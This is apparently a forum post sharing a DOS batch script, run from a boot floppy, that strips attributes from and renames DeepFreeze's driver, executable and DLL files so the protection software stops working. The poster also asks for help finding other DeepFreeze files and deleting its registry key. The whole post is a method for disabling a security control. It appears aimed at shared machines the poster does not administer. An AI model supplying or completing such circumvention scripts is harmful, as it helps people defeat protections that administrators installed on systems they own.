----The Following Is A Code For A Batch File----
C:
cd progra~1
cd hypert~1
cd deepfr~1
attrib persis0.sys - h -s
ren *.sys *.sys1
ren *.exe *.exe1
ren *.dll *.dll1

cd..
cd..
cd..
attrib persis0.sys -h -s
ren persis0.sys persis0.sys1

----The above code will work for older versions of deepfreeze----
I need help finishing this code though. Id anyone knows of files associated with DeepFreeze Besides:
the files in C:\Profram Files\Hypertechnologies\DeepFreeze
or the files loacted in C:\ names Persis0.sys. I Also nees a way to delete the hypertechnologies key from the registry.

----In order for this to work you have to put the batch file on a boot disk. Put the bootdisk in the a drive and restart the pc. When the boot disk is done doing its thing run the batch file. ----